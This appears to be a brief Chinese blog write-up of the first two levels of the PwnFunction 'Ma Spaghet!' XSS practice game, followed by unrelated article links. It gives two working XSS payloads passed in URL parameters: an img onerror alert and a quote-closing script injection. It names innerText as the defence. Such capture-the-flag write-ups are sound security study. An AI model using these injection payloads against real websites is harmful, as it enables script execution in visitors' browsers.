一、环境
XSS Game - Ma Spaghet! | PwnFunction
二、开始闯关
第一关
看看代码
试一下直接写
明显进来了为什么不执行看看官方文档吧
你不执行那我就更改单标签去使用呗
?somebody=<img%20src=1%20onerror="alert(1)">
防御:
innerText
第二关
看看源码:
考察一个基础的闭合
?jeff=1";alert(1)//
后续待更新
xss高级靶场
凌晨五点的星2024-03-02 9:13
相关推荐
蚂蚁RichLab前端团队17 小时前
🚀🚀🚀 RichLab - 花呗前端团队招贤纳士 - 【转岗/内推/社招】孩子 你要相信光17 小时前
css之一个元素可以同时应用多个动画效果huangql52017 小时前
npm 发布流程——从创建组件到发布到 npm 仓库Days205017 小时前
LeaferJS好用的 Canvas 引擎小白菜学前端18 小时前
vue2 常用内置指令总结林_深时见鹿18 小时前
Vue + ElementPlus 自定义指令控制输入框只可以输入数字椒盐螺丝钉18 小时前
Vue组件化开发介绍koooo~18 小时前
v-model与-sync的演变和融合matlab的学徒18 小时前
Web与Nginx网站服务(改)从零开始学习人工智能18 小时前
快速搭建B/S架构HTML演示页:从工具选择到实战落地